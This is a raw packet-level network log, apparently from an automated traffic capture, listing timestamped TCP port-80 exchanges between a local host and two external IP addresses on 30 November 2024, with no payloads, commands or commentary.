Nov 30, 2024 04:06:53.152764082 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.152818918 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.152898073 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.152951002 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.154263973 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.154320002 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.154361010 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.154431105 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.154587030 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.154627085 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.154648066 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.155709982 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.155761003 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.155826092 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.155878067 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.157179117 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.157237053 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.157288074 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.157368898 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.158628941 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.158684015 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.158719063 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.158771038 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.160084963 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.160135984 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.160186052 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.160238981 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.161547899 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.161597013 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.161648989 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.161696911 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.163058043 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.163110971 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.163158894 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.163208961 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.164484978 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.164537907 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.164669991 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.164722919 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.165939093 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.165987968 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.166037083 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.166085958 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.167361021 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.167418957 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.167464018 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.167668104 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.168831110 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.168888092 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.168941975 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.168992043 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.170284033 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.170331955 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.170401096 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.170449018 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.171750069 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.171803951 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.171857119 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.171907902 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.173207045 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.173271894 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.173305035 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.173351049 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.174649000 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.174700022 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.174758911 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.174818993 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.176115990 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.176162004 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.176223040 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.176270962 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.177580118 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.177632093 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.177685976 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.177736998 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.179030895 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.179084063 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.179142952 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.179229975 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.180489063 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.180537939 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.180737019 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.180785894 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.181926012 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.181972980 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.182045937 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.182113886 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.183435917 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.183489084 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.183614016 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.183666945 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.184884071 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.184935093 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.184967041 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.185018063 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.186335087 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.186384916 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.186440945 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.186517000 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.187776089 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.187824011 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.187906981 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.187958956 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.189241886 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.189296007 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.189331055 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.189382076 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.190699100 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.190769911 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.190798044 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.190845966 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.192150116 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.192250013 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.192270041 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.192440987 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.193603992 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.193655014 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.193712950 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.193768978 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.205282927 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.222395897 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.222506046 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.222558975 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.226624012 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.226748943 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.226794958 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.235016108 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.235121965 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.235167027 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.243421078 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.243547916 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.243596077 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.251852989 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.251981974 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.252027035 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.260243893 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.260384083 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.260435104 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.268642902 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.268759012 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.268804073 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.277079105 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.277091026 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.277138948 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.285429001 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.285574913 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.285621881 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.293849945 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.293876886 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.293922901 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.302212954 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.305387020 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.305396080 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.305444002 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.305717945 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.305772066 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.305803061 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.305897951 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.306865931 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.306921005 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.307002068 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.307075977 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.308022022 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.308074951 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.308080912 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.308129072 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.309202909 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.309221029 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.309256077 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.309281111 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.310348034 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.310398102 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.310400009 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.310444117 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.311492920 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.311547995 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.311599970 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.311652899 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.312603951 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.312653065 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.312730074 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.312778950 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.313733101 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.313781023 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.313885927 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.313941956 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.314851999 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.314901114 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.314965010 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.315015078 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.315944910 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.316005945 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.316061020 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.316118956 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.317025900 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.317090034 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.317120075 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.317167044 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.318152905 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.318217039 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.318320036 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.318372011 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.319211006 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.319255114 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.319322109 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.319515944 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.320286989 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.320337057 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.320413113 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.320463896 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.321382046 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.321477890 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.321487904 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.321537971 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.322478056 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.322526932 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.322586060 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.322635889 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.323558092 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.323606968 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.323673010 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.323724031 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.324631929 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.324678898 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.324739933 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.324790955 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.325721025 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.325773001 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.325829983 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.325881004 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.326807022 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.326858997 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.326921940 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.326972961 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.327892065 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.327939987 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.327984095 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.328027964 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.328991890 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.329046011 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.329108000 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.329158068 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.330069065 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.330121040 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.330152988 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.330199957 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.331161022 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.331213951 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.331253052 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.331617117 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.332261086 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.332320929 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.332355022 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.332406998 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.333329916 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.333381891 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.333411932 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.333457947 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.334398031 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.334449053 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.334505081 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.334553957 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.335522890 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.335573912 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.335633993 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.335686922 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.336606979 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.336656094 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.336735964 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.336802006 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.337677002 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.337726116 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.337785959 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.337991953 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.338767052 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.338819981 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.338874102 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.338920116 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.339854002 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.339905977 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.339967966 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.340019941 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.340934038 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.340986013 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.341063976 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.341114044 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.342020988 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.342072964 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.342138052 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.342186928 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.343118906 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.343167067 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.343215942 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.343287945 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.344214916 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.344271898 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.344326973 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.344369888 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.345307112 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.345357895 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.345410109 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.345460892 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.346373081 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.346424103 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.346493006 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.346544981 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.347460985 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.347513914 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.347577095 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.347624063 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.348546982 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.348598003 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.348660946 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.348711014 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.349642992 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.349700928 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.349767923 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.349826097 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.350717068 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.350770950 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.350836039 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.350887060 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.351819038 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.351869106 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.351927996 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.351975918 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.352437973 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.352929115 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.353030920 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.354012966 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.354129076 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.354907990 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.355082989 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.355140924 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.355210066 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.355262041 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.356158018 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.356209993 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.356261969 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.356313944 CET	49892	80	192.168.2.4	31.41.244.11
